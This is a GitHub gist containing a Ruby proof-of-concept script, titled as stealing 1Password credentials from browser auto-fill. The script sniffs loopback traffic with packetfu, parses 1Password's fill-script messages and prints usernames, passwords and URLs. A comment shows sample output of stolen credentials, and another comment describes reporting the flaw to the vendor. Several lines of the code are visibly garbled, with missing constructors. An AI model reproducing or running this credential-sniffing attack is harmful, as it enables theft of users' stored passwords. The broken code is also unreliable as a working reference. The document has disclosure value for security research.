Skip to content

Instantly share code, notes, and snippets.

Last active October 10, 2019 23:09
  • Star 1 You must be signed in to star a gist
  • Fork 2 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
Steal 1Password credentials from browser auto-fill PoC
# Path setting slight of hand:
$: << File.expand_path("../../lib", __FILE__)
require 'packetfu'
require 'json'
capture_thread = do
cap = => 'lo0', :start => true) do |p|
pkt = PacketFu::Packet.parse p
if pkt.payload.include?("executeFillScript")
parsed_json = JSON.parse(pkt.payload.match(/{"action.*/)[0])
username = parsed_json["payload"]["script"][1][2]
password = parsed_json["payload"]["script"][3][2]
url = parsed_json["payload"]["url"]
puts "[+] Stolen Credentials: user(#{username}), password(#{password}), url(#{url})"
puts "Listening for 1Password interprocess traffic on loopback..."
Copy link

$ rvmsudo ruby examples/steal_1password_creds.rb
Listening for 1Password interprocess traffic on loopback...
[+] Stolen Credentials: user(wbrandis), password(myvoiceismypassportverify), url(

Copy link

Funny story about this, I found it too a couple months ago, reported it and 1Password really didn't seem to care.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment